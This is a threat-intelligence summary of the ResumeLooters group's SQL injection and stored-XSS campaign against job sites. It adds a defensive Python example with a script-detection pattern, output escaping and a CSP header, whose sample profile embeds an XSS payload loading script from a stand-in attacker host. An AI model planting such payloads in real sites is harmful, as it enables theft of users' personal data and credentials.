ResumeLooters, a threat actor group identified by cybersecurity firm Group-IB in November 2023, has been actively exploiting web vulnerabilities to steal personal data. The group mainly targets victims in India, Taiwan, Thailand, Vietnam, China, and Australia, utilizing SQL injection attacks and Cross-Site Scripting (XSS) techniques to infiltrate systems. In one instance, the threat actor created a fake employer profile on a legitimate recruitment website, injecting malicious XSS script into one of the fields in the profile. This allowed them to siphon off emails and other personal information from people's resumes, as revealed by researchers in a blog post published on February 6, 2024.
The group's modus operandi involves inserting XSS scripts into all possible web forms on targeted websites, with the aim of displaying phishing forms to obtain admin credentials. Group-IB discovered evidence of various penetration testing tools on ResumeLooters' malicious servers, including sqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance Lighthouse), and Dirsearch. These tools were used to target employment websites and retail companies, indicating a broad range of potential victims.
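The stored-XSS technique described above works only when a profile field is written back into a page unescaped. The following is an added example, not code from Group-IB or from any site named in the report: a hypothetical recruitment-site profile model (`EmployerProfile`, the field names and the `attacker.example` host are all constructed) with a review check that flags script-like content in submitted fields, output encoding for every rendered field, and a strict Content-Security-Policy header as defence in depth.

```python
import html
import re
from dataclasses import dataclass


# Hypothetical employer profile as a recruitment site might store it (constructed model).
@dataclass
class EmployerProfile:
    company_name: str
    description: str
    website: str


# Markers that a free-text profile field is carrying script rather than text.
SUSPICIOUS = re.compile(r"<\s*script|javascript:|on\w+\s*=|<\s*iframe", re.IGNORECASE)


def flag_suspicious_fields(profile: EmployerProfile) -> list[str]:
    """Return the names of fields whose raw value looks like an injection attempt.
    Used for alerting and manual review of new employer profiles, not as the only control."""
    return [name for name, value in vars(profile).items() if SUSPICIOUS.search(value)]


def safe_url(url: str) -> str:
    """In href context, allow only http(s) URLs; any other scheme is neutralised to '#'."""
    return url if re.match(r"^https?://", url, re.IGNORECASE) else "#"


def render_profile(profile: EmployerProfile) -> str:
    """Render the profile with each field escaped for the HTML context it lands in,
    so a script placed in a field is displayed as text instead of executed."""
    return (
        f"<h2>{html.escape(profile.company_name)}</h2>\n"
        f"<p>{html.escape(profile.description)}</p>\n"
        f'<a href="{html.escape(safe_url(profile.website), quote=True)}">Website</a>'
    )


def security_headers() -> dict[str, str]:
    """CSP that blocks inline and third-party script even if encoding is missed somewhere."""
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'"}


# Constructed sample: a fake employer profile with script in the name and a javascript: URL.
SAMPLE_PROFILE = EmployerProfile(
    company_name='Acme Corp<script src="https://attacker.example/x.js"></script>',
    description="Hiring now",
    website="javascript:alert(1)",
)

if __name__ == "__main__":
    print("flagged:", flag_suspicious_fields(SAMPLE_PROFILE))
    print(render_profile(SAMPLE_PROFILE))
```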
Despite the damage they can do, both ResumeLooters and a similar group called GambleForce rely on straightforward attack methods that are readily preventable. This highlights how important it is for organizations to prioritize cybersecurity measures and remain vigilant against evolving threats. As Nikita Rostovcev, a senior threat analyst at Group-IB, noted, "ResumeLooters is yet another example of how much damage can be made with just a handful of publicly available tools." The discovery of this malicious campaign underscores the need for comprehensive security protocols, particularly in sectors handling sensitive personal data.
Description last updated: 2024-02-16T10:13:56.971Z